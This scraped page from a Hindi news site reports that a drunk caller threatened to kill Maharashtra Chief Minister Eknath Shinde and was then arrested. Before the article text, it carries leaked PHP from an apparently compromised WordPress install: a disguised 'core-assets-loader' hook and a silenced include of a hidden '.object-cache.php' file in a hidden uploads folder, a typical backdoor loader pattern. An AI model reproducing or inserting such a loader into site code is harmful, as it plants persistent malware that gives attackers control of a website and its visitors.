add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Eknath Shinde Death Threats: ‘एकनाथ शिंदे को उड़ा दूंगा’, महाराष्ट्र के सीएम को मिली जान से मारने की धमकी – SOCH INDIA
Menu

देश
Eknath Shinde Death Threats: ‘एकनाथ शिंदे को उड़ा दूंगा’, महाराष्ट्र के सीएम को मिली जान से मारने की धमकी

nobanner

महाराष्ट्र के मुख्यमंत्री एकनाथ शिंदे को जान से मारने की धमकी मिली है. महाराष्ट्र पुलिस के कंट्रोल रूम में फोन करके कॉलर ने कहा कि मैं एकनाथ शिंदे को उड़ा दूँगा और इतना कहकर उसने फ़ोन कट कर दिया.

महाराष्ट्र पुलिस को कंट्रोल नंबर 112 नंबर एक कॉल मिली थी. यह कॉल सोमवार (10 अप्रैल) को देर शाम आई थी. फोन करने वाले ने पुलिस से कहा कि वह महाराष्ट्र के मुख्यमंत्री एकनाथ शिंदे को उड़ा देगा.

पुलिस ने कॉलर को किया गिरफ्तार

सीएम को धमकी की कॉल के बाद पुलिस तुरंत एक्टिव हो गई और कॉलर की लोकेशन ट्रेस की. इसके बाद पुणे पुलिस ने कॉलर को गिरफ्तार कर लिया.

कॉलर मुंबई के धारावी इलाक़े का रहने वाला है. पूछताछ में पता चला कि कॉलर ने जब फोन किया था, उस समय वह शराब के नशे में था.